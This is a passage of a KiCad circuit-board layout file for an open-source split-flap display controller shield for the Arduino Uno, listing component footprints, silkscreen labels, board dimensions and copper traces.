0.12)) (fp_line (start 2.35 -4.006) (end 2.35 4.006) (layer F.SilkS) (width 0.12)) (fp_line (start 2.31 -4.012) (end 2.31 4.012) (layer F.SilkS) (width 0.12)) (fp_line (start 2.27 -4.017) (end 2.27 4.017) (layer F.SilkS) (width 0.12)) (fp_line (start 2.23 -4.022) (end 2.23 4.022) (layer F.SilkS) (width 0.12)) (fp_line (start 2.19 -4.027) (end 2.19 4.027) (layer F.SilkS) (width 0.12)) (fp_line (start 2.15 -4.031) (end 2.15 4.031) (layer F.SilkS) (width 0.12)) (fp_line (start 2.11 -4.035) (end 2.11 4.035) (layer F.SilkS) (width 0.12)) (fp_line (start 2.07 -4.038) (end 2.07 4.038) (layer F.SilkS) (width 0.12)) (fp_line (start 2.03 -4.041) (end 2.03 4.041) (layer F.SilkS) (width 0.12)) (fp_line (start 1.99 -4.043) (end 1.99 4.043) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -4.046) (end 1.95 4.046) (layer F.SilkS) (width 0.12)) (fp_line (start 1.91 -4.047) (end 1.91 4.047) (layer F.SilkS) (width 0.12)) (fp_line (start 1.87 -4.049) (end 1.87 4.049) (layer F.SilkS) (width 0.12)) (fp_line (start 1.83 -4.05) (end 1.83 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start 1.79 -4.05) (end 1.79 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start 1.75 -4.05) (end 1.75 4.05) (layer F.SilkS) (width 0.12)) (fp_line (start -1.6 -0.65) (end -1.6 0.65) (layer F.Fab) (width 0.1)) (fp_line (start -2.2 0) (end -1 0) (layer F.Fab) (width 0.1)) (fp_circle (center 1.75 0) (end 5.84 0) (layer F.SilkS) (width 0.12)) (fp_circle (center 1.75 0) (end 5.75 0) (layer F.Fab) (width 0.1)) (fp_text user %R (at 1.75 0 180) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole circle (at 3.5 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (model ${KISYS3DMOD}/Capacitors_THT.3dshapes/CP_Radial_D8.0mm_P3.50mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module LED3mmBetterSilkScreen:LED_D3.0mm (layer F.Cu) (tedit 5F7C57E1) (tstamp 59E9994A) (at 22.352 38.862 90) (descr "LED, diameter 3.0mm, 2 pins") (tags "LED diameter 3.0mm 2 pins") (path /571479BE) (fp_text reference D1 (at 3.937 -1.397 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value Mot+ (at 0.635 4.318 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_arc (start 1.27 0) (end 0.508 1.778) (angle -80) (layer F.SilkS) (width 0.12)) (fp_arc (start 1.27 0) (end 0.508 -1.778) (angle 80) (layer F.SilkS) (width 0.12)) (fp_arc (start 1.27 0) (end -0.23 -1.16619) (angle 284.3) (layer F.Fab) (width 0.1)) (fp_line (start 0.508 -1.778) (end 0.508 -1.016) (layer F.SilkS) (width 0.15)) (fp_line (start 0.508 1.778) (end 0.508 1.016) (layer F.SilkS) (width 0.15)) (fp_circle (center 1.27 0) (end 2.77 0) (layer F.Fab) (width 0.1)) (fp_line (start -0.23 -1.16619) (end -0.23 1.16619) (layer F.Fab) (width 0.1)) (fp_line (start -1.15 -2.25) (end -1.15 2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.15 2.25) (end 3.7 2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.7 2.25) (end 3.7 -2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.7 -2.25) (end -1.15 -2.25) (layer F.CrtYd) (width 0.05)) (pad 2 thru_hole circle (at 2.54 0 90) (size 1.8 1.8) (drill 0.9) (layers *.Cu *.Mask) (net 18 "Net-(D1-Pad2)")) (pad 1 thru_hole rect (at 0 0 90) (size 1.8 1.8) (drill 0.9) (layers *.Cu *.Mask) (net 43 "Net-(D1-Pad1)")) (model ${KISYS3DMOD}/LEDs.3dshapes/LED_D3.0mm.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module LED3mmBetterSilkScreen:LED_D3.0mm (layer F.Cu) (tedit 5F7C57F2) (tstamp 59E9994F) (at 22.352 41.91 270) (descr "LED, diameter 3.0mm, 2 pins") (tags "LED diameter 3.0mm 2 pins") (path /59D78B15) (fp_text reference D2 (at 4.318 1.27) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 5V (at 0.635 -3.429) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 3.7 -2.25) (end -1.15 -2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.7 2.25) (end 3.7 -2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.15 2.25) (end 3.7 2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.15 -2.25) (end -1.15 2.25) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.23 -1.16619) (end -0.23 1.16619) (layer F.Fab) (width 0.1)) (fp_circle (center 1.27 0) (end 2.77 0) (layer F.Fab) (width 0.1)) (fp_line (start 0.508 1.778) (end 0.508 1.016) (layer F.SilkS) (width 0.15)) (fp_line (start 0.508 -1.778) (end 0.508 -1.016) (layer F.SilkS) (width 0.15)) (fp_arc (start 1.27 0) (end -0.23 -1.16619) (angle 284.3) (layer F.Fab) (width 0.1)) (fp_arc (start 1.27 0) (end 0.508 -1.778) (angle 80) (layer F.SilkS) (width 0.12)) (fp_arc (start 1.27 0) (end 0.508 1.778) (angle -80) (layer F.SilkS) (width 0.12)) (pad 1 thru_hole rect (at 0 0 270) (size 1.8 1.8) (drill 0.9) (layers *.Cu *.Mask) (net 43 "Net-(D1-Pad1)")) (pad 2 thru_hole circle (at 2.54 0 270) (size 1.8 1.8) (drill 0.9) (layers *.Cu *.Mask) (net 19 "Net-(D2-Pad2)")) (model ${KISYS3DMOD}/LEDs.3dshapes/LED_D3.0mm.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 5B92F242) (tstamp 5B693074) (at 89.408 48.514 180) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /5B694203) (fp_text reference R10 (at 10.16 -0.254) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 47k (at 3.81 0 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 180) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 27 /SENSOR_DATA_IN)) (pad 2 thru_hole oval (at 7.62 0 180) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 1 GND)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module MountingHoles:M4_mount (layer F.Cu) (tedit 5B995961) (tstamp 5B6E28D9) (at 111.506 63.942) (path /5B9984BA) (attr virtual) (fp_text reference Z3 (at 0 1.7) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value MOUNT (at 0 -1.5) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_circle (center 0 0) (end 4 0) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole circle (at 0 0) (size 5.5 5.5) (drill 4.5) (layers *.Cu *.Mask) (net 1 GND) (clearance 1.5)) ) (module Pin_Headers:Pin_Header_Straight_1x02_Pitch2.54mm (layer F.Cu) (tedit 5B92F2F7) (tstamp 5B70B16E) (at 24.638 30.734 270) (descr "Through hole straight pin header, 1x02, 2.54mm pitch, single row") (tags "Through hole pin header THT 1x02 2.54mm single row") (path /5B70A750) (fp_text reference JP1 (at 0 -3.302) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value "VIN <-> 12V" (at 0 4.87 270) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 1.8 -1.8) (end -1.8 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.8 4.35) (end 1.8 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 4.35) (end 1.8 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 -1.8) (end -1.8 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.33 -1.33) (end 0 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 0) (end -1.33 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end 1.33 1.27) (layer F.SilkS) (width 0.12)) (fp_line (start 1.33 1.27) (end 1.33 3.87) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end -1.33 3.87) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 3.87) (end 1.33 3.87) (layer F.SilkS) (width 0.12)) (fp_line (start -1.27 -0.635) (end -0.635 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start -1.27 3.81) (end -1.27 -0.635) (layer F.Fab) (width 0.1)) (fp_line (start 1.27 3.81) (end -1.27 3.81) (layer F.Fab) (width 0.1)) (fp_line (start 1.27 -1.27) (end 1.27 3.81) (layer F.Fab) (width 0.1)) (fp_line (start -0.635 -1.27) (end 1.27 -1.27) (layer F.Fab) (width 0.1)) (fp_text user %R (at 0 1.27) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0 270) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole oval (at 0 2.54 270) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 44 "Net-(JP1-Pad2)")) (model ${KISYS3DMOD}/Pin_Headers.3dshapes/Pin_Header_Straight_1x02_Pitch2.54mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module ArduinoUnoShield:arduino_uno_shield (layer F.Cu) (tedit 5B995524) (tstamp 59DB0984) (at 19.558 -17.78 270) (path /59D16939) (fp_text reference U1 (at 21.844 -43.18 270) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value arduino_uno_shield (at 67.78 -28.442) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_circle (center 66.04 -7.62) (end 69.215 -7.62) (layer F.SilkS) (width 0.15)) (fp_circle (center 66.04 -35.56) (end 69.215 -35.56) (layer F.SilkS) (width 0.15)) (pad "" thru_hole circle (at 66.04 -7.62 270) (size 3.6 3.6) (drill 3.2) (layers *.Cu *.Mask)) (pad GND thru_hole circle (at 43.18 -2.54 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad VIN thru_hole circle (at 45.72 -2.54 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 44 "Net-(JP1-Pad2)")) (pad ISP6 thru_hole circle (at 66.18 -25.35 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 1 GND)) (pad ISP5 thru_hole circle (at 63.64 -25.35 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask)) (pad ISP4 thru_hole circle (at 66.18 -27.89 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 20 /MOTOR_DATA_IN)) (pad ISP3 thru_hole circle (at 63.64 -27.89 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 24 /SPI_CLOCK)) (pad ISP2 thru_hole circle (at 66.18 -30.43 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 15 +5V)) (pad ISP1 thru_hole circle (at 63.64 -30.43 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 22 /SENSOR_DATA_OUT)) (pad D6 thru_hole circle (at 48.26 -50.8 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 38 "Net-(R9-Pad1)")) (pad D5 thru_hole circle (at 50.8 -50.8 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 23 /SENSOR_LATCH)) (pad D4 thru_hole circle (at 53.34 -50.8 270) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask) (net 21 /MOTOR_LATCH)) (pad "" thru_hole circle (at 66.04 -35.56 270) (size 3.6 3.6) (drill 3.2) (layers *.Cu *.Mask)) ) (module Oddities:Dummy_Empty (layer F.Cu) (tedit 5B995534) (tstamp 5B9953D9) (at 118 46) (descr "Only empty Dummy to give satsfaction to DRC") (tags "Only empty Dummy to give satsfaction to DRC") (path /5B992FE3) (fp_text reference Z4 (at 0.07112 -2.49936) (layer F.SilkS) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value "ribbon cable (BOM only)" (at 0 0 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) ) (module 74HC165-DIP:74HC165_DIP-16_W7.62mm (layer F.Cu) (tedit 6056E86A) (tstamp 5F7C3ACB) (at 100.584 65.278 180) (descr "16-lead dip package, row spacing 7.62 mm (300 mils)") (tags "dil dip 2.54 300") (path /59D01A9C) (fp_text reference U3 (at 2.794 0.508 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 74HC165 (at 3.81 8.89 90) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.05 19.685) (end 8.65 19.685) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.05 -1.905) (end 8.65 -1.905) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.65 -1.905) (end 8.65 19.685) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.05 -1.905) (end -1.05 19.685) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.27 19.05) (end 1.27 -1.27) (layer F.SilkS) (width 0.15)) (fp_line (start 1.27 19.05) (end 6.35 19.05) (layer F.SilkS) (width 0.15)) (fp_line (start 6.35 -1.27) (end 6.35 19.05) (layer F.SilkS) (width 0.15)) (fp_line (start 6.35 -1.27) (end 4.81 -1.27) (layer F.SilkS) (width 0.15)) (fp_line (start 1.27 -1.27) (end 2.81 -1.27) (layer F.SilkS) (width 0.15)) (fp_arc (start 3.81 -1.27) (end 4.81 -1.27) (angle 180) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole oval (at 0 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 23 /SENSOR_LATCH)) (pad 2 thru_hole oval (at 0 2.54 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 24 /SPI_CLOCK)) (pad 3 thru_hole oval (at 0 5.08 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 39 "Net-(P10-Pad1)")) (pad 4 thru_hole oval (at 0 7.62 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 40 "Net-(P10-Pad2)")) (pad 5 thru_hole oval (at 0 10.16 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 41 "Net-(P10-Pad3)")) (pad 6 thru_hole oval (at 0 12.7 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 42 "Net-(P10-Pad4)")) (pad 7 thru_hole oval (at 0 15.24 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS)) (pad 8 thru_hole oval (at 0 17.78 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 9 thru_hole oval (at 7.62 17.78 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 22 /SENSOR_DATA_OUT)) (pad 10 thru_hole oval (at 7.62 15.24 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 27 /SENSOR_DATA_IN)) (pad 11 thru_hole oval (at 7.62 12.7 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 31 /SENSE1)) (pad 12 thru_hole oval (at 7.62 10.16 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 32 /SENSE2)) (pad 13 thru_hole oval (at 7.62 7.62 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 33 /SENSE3)) (pad 14 thru_hole oval (at 7.62 5.08 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 34 /SENSE4)) (pad 15 thru_hole oval (at 7.62 2.54 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 1 GND)) (pad 16 thru_hole oval (at 7.62 0 180) (size 1.6 1.6) (drill 0.8) (layers *.Cu *.Mask F.SilkS) (net 15 +5V)) (model Housings_DIP.3dshapes/DIP-16_W7.62mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (gr_line (start 20.574 25.273) (end 20.574 27.94) (angle 90) (layer B.SilkS) (width 0.2)) (gr_line (start 23.622 25.273) (end 23.622 27.94) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 22.098 25.273) (end 20.574 25.273) (angle 180) (layer B.SilkS) (width 0.2) (tstamp 5F7C64A7)) (gr_arc (start 22.098 27.94) (end 20.574 27.94) (angle -180) (layer B.SilkS) (width 0.2) (tstamp 5F7C649B)) (gr_line (start 50.038 49.9618) (end 44.9326 49.9618) (angle 90) (layer B.SilkS) (width 0.2) (tstamp 5F7C6177)) (gr_line (start 43.3324 45.8216) (end 43.3324 48.4632) (angle 90) (layer B.SilkS) (width 0.2)) (gr_line (start 50.0126 44.2976) (end 44.9072 44.2976) (angle 90) (layer B.SilkS) (width 0.2)) (gr_line (start 51.562 45.8216) (end 51.562 48.3616) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 44.9072 48.387) (end 44.958 49.9618) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 44.9072 45.847) (end 43.3324 45.8724) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 49.9872 45.8724) (end 49.9872 44.2976) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 49.9872 48.387) (end 51.562 48.3616) (angle 90) (layer B.SilkS) (width 0.2)) (gr_line (start 68.834 30.48) (end 68.834 35.56) (angle 90) (layer B.SilkS) (width 0.2) (tstamp 5F7C5E40)) (gr_line (start 71.882 30.48) (end 71.882 35.56) (angle 90) (layer B.SilkS) (width 0.2)) (gr_arc (start 70.358 35.56) (end 68.834 35.56) (angle -180) (layer B.SilkS) (width 0.2) (tstamp 5F7C5E17)) (gr_arc (start 70.358 30.48) (end 68.834 30.48) (angle 180) (layer B.SilkS) (width 0.2)) (gr_text LEDs (at 26.416 40.259) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify mirror)) ) (dimension 96 (width 0.3) (layer Cmts.User) (gr_text "96.000 mm" (at 68 13.65) (layer Cmts.User) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (feature1 (pts (xy 116 20) (xy 116 12.3))) (feature2 (pts (xy 20 20) (xy 20 12.3))) (crossbar (pts (xy 20 15) (xy 116 15))) (arrow1a (pts (xy 116 15) (xy 114.873496 15.586421))) (arrow1b (pts (xy 116 15) (xy 114.873496 14.413579))) (arrow2a (pts (xy 20 15) (xy 21.126504 15.586421))) (arrow2b (pts (xy 20 15) (xy 21.126504 14.413579))) ) (dimension 8.128 (width 0.3) (layer Cmts.User) (gr_text "8.128 mm" (at 27 17) (layer Cmts.User) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (feature1 (pts (xy 28.128 24.064) (xy 28.128 15.776))) (feature2 (pts (xy 20 24.064) (xy 20 15.776))) (crossbar (pts (xy 20 18.476) (xy 28.128 18.476))) (arrow1a (pts (xy 28.128 18.476) (xy 27.001496 19.062421))) (arrow1b (pts (xy 28.128 18.476) (xy 27.001496 17.889579))) (arrow2a (pts (xy 20 18.476) (xy 21.126504 19.062421))) (arrow2b (pts (xy 20 18.476) (xy 21.126504 17.889579))) ) (dimension 48 (width 0.3) (layer Cmts.User) (gr_text "48.000 mm" (at 13.65 44 90) (layer Cmts.User) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (feature1 (pts (xy 20 20) (xy 12.3 20))) (feature2 (pts (xy 20 68) (xy 12.3 68))) (crossbar (pts (xy 15 68) (xy 15 20))) (arrow1a (pts (xy 15 20) (xy 15.586421 21.126504))) (arrow1b (pts (xy 15 20) (xy 14.413579 21.126504))) (arrow2a (pts (xy 15 68) (xy 15.586421 66.873496))) (arrow2b (pts (xy 15 68) (xy 14.413579 66.873496))) ) (dimension 39.878 (width 0.3) (layer Cmts.User) (gr_text "39.878 mm" (at 17.126 44.003 90) (layer Cmts.User) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (feature1 (pts (xy 28.128 24.064) (xy 15.776 24.064))) (feature2 (pts (xy 28.128 63.942) (xy 15.776 63.942))) (crossbar (pts (xy 18.476 63.942) (xy 18.476 24.064))) (arrow1a (pts (xy 18.476 24.064) (xy 19.062421 25.190504))) (arrow1b (pts (xy 18.476 24.064) (xy 17.889579 25.190504))) (arrow2a (pts (xy 18.476 63.942) (xy 19.062421 62.815496))) (arrow2b (pts (xy 18.476 63.942) (xy 17.889579 62.815496))) ) (gr_line (start 43.053 33.528) (end 43.053 44.196) (angle 90) (layer F.SilkS) (width 0.2)) (gr_line (start 103.378 35.56) (end 103.378 46.228) (angle 90) (layer F.SilkS) (width 0.2)) (gr_text "MOT\nGND\n5V\nML\nSL\nLI\nNC" (at 43.307 38.862) (layer F.SilkS) (effects (font (size 1 0.8) (thickness 0.12)) (justify left)) ) (gr_text "MOT\nGND\n5V\nMDI\nSDO\nSCL\nNC" (at 42.799 38.862) (layer F.SilkS) (effects (font (size 1 0.8) (thickness 0.12)) (justify right)) ) (gr_text "MOT\nGND\n5V\nML\nSL\nLO\nNC" (at 103.632 40.894) (layer F.SilkS) (effects (font (size 1 0.8) (thickness 0.12)) (justify left)) ) (gr_text "MOT\nGND\n5V\nMDO\nSDI\nSCL\nNC" (at 103.124 40.894) (layer F.SilkS) (effects (font (size 1 0.8) (thickness 0.12)) (justify right)) ) (gr_text VIN (at 24.003 27.94) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify right mirror)) ) (gr_text GND (at 80.264 66.294) (layer F.SilkS) (effects (font (size 1.2 1) (thickness 0.2)) (justify right)) ) (gr_text 5V (at 80.264 63.754) (layer F.SilkS) (effects (font (size 1.2 1) (thickness 0.2)) (justify right)) ) (dimension 83.312 (width 0.3) (layer Cmts.User) (gr_text "83.312 mm" (at 69.85 70.438) (layer Cmts.User) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (feature1 (pts (xy 111.506 64.008) (xy 111.506 71.788))) (feature2 (pts (xy 28.194 64.008) (xy 28.194 71.788))) (crossbar (pts (xy 28.194 69.088) (xy 111.506 69.088))) (arrow1a (pts (xy 111.506 69.088) (xy 110.379496 69.674421))) (arrow1b (pts (xy 111.506 69.088) (xy 110.379496 68.501579))) (arrow2a (pts (xy 28.194 69.088) (xy 29.320504 69.674421))) (arrow2b (pts (xy 28.194 69.088) (xy 29.320504 68.501579))) ) (gr_text D (at 97.028 27.432) (layer F.SilkS) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (gr_text C (at 81.788 27.432) (layer F.SilkS) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (gr_text B (at 66.548 27.432) (layer F.SilkS) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (gr_text A (at 51.308 27.432) (layer F.SilkS) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (gr_text Arduino (at 68.072 31.242 90) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.12)) (justify left mirror)) ) (gr_text D4 (at 73.787 35.56) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify left mirror)) ) (gr_text D5 (at 73.787 33.909) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify left mirror)) ) (gr_text D6 (at 73.787 32.258) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify left mirror)) ) (gr_text D (at 87.122 46.482) (layer F.SilkS) (effects (font (size 2.5 2) (thickness 0.5))) ) (gr_text C (at 78.232 46.482) (layer F.SilkS) (effects (font (size 2.5 2) (thickness 0.5))) ) (gr_text B (at 69.342 46.482) (layer F.SilkS) (effects (font (size 2.5 2) (thickness 0.5))) ) (gr_text A (at 60.198 46.482) (layer F.SilkS) (effects (font (size 2.5 2) (thickness 0.5))) ) (gr_line (start 116 20) (end 116 68) (angle 90) (layer Edge.Cuts) (width 0.15)) (gr_line (start 20 68) (end 20 20) (angle 90) (layer Edge.Cuts) (width 0.15)) (gr_line (start 116 68) (end 20 68) (angle 90) (layer Edge.Cuts) (width 0.15)) (gr_line (start 20 20) (end 116 20) (angle 90) (layer Edge.Cuts) (width 0.15)) (gr_text "Splitflap Controller\nhttps://github.com/scottbez1/splitflap" (at 33.528 63.754) (layer F.SilkS) (effects (font (size 1.6 1.4) (thickness 0.25)) (justify left)) ) (gr_text "COMMIT: deadbeef \nDATE: YYYY-MM-DD" (at 53.086 56.134) (layer F.SilkS) (effects (font (size 1.4 1.2) (thickness 0.2)) (justify left)) ) (gr_text 5-12V (at 101.854 30.226 90) (layer F.SilkS) (effects (font (size 1 0.75) (thickness 0.15))) ) (gr_text ISP (at 47.371 50.927) (layer B.SilkS) (effects (font (size 1 0.8) (thickness 0.2)) (justify mirror)) ) (gr_text D (at 90.678 61.214) (layer F.SilkS) (effects (font (size 1.2 1) (thickness 0.2)) (justify left)) ) (gr_text A (at 80.264 61.214) (layer F.SilkS) (effects (font (size 1.2 1) (thickness 0.2)) (justify right)) ) (segment (start 27.066 42.164) (end 27.066 40.147) (width 0.25) (layer B.Cu) (net 1)) (via (at 75.692 41.91) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 75.732 41.87) (end 75.692 41.91) (width 0.25) (layer F.Cu) (net 1) (tstamp 5B731CE0)) (segment (start 75.732 40.564) (end 75.732 41.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 75.732 40.564) (end 75.732 40.854) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 84.622 40.564) (end 84.622 41.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (via (at 84.582 41.91) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 84.622 41.87) (end 84.582 41.91) (width 0.25) (layer F.Cu) (net 1) (tstamp 5B731CA6)) (segment (start 66.842 40.564) (end 66.842 41.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (via (at 66.802 41.91) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 66.842 41.87) (end 66.802 41.91) (width 0.25) (layer F.Cu) (net 1) (tstamp 5B731C94)) (segment (start 57.952 40.564) (end 57.952 41.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (via (at 57.912 41.91) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 57.952 41.87) (end 57.912 41.91) (width 0.25) (layer F.Cu) (net 1) (tstamp 5B731C8F)) (segment (start 57.15 29.972) (end 57.15 27.258) (width 0.5) (layer B.Cu) (net 2) (status 10)) (segment (start 57.15 27.258) (end 61.548 22.86) (width 0.5) (layer 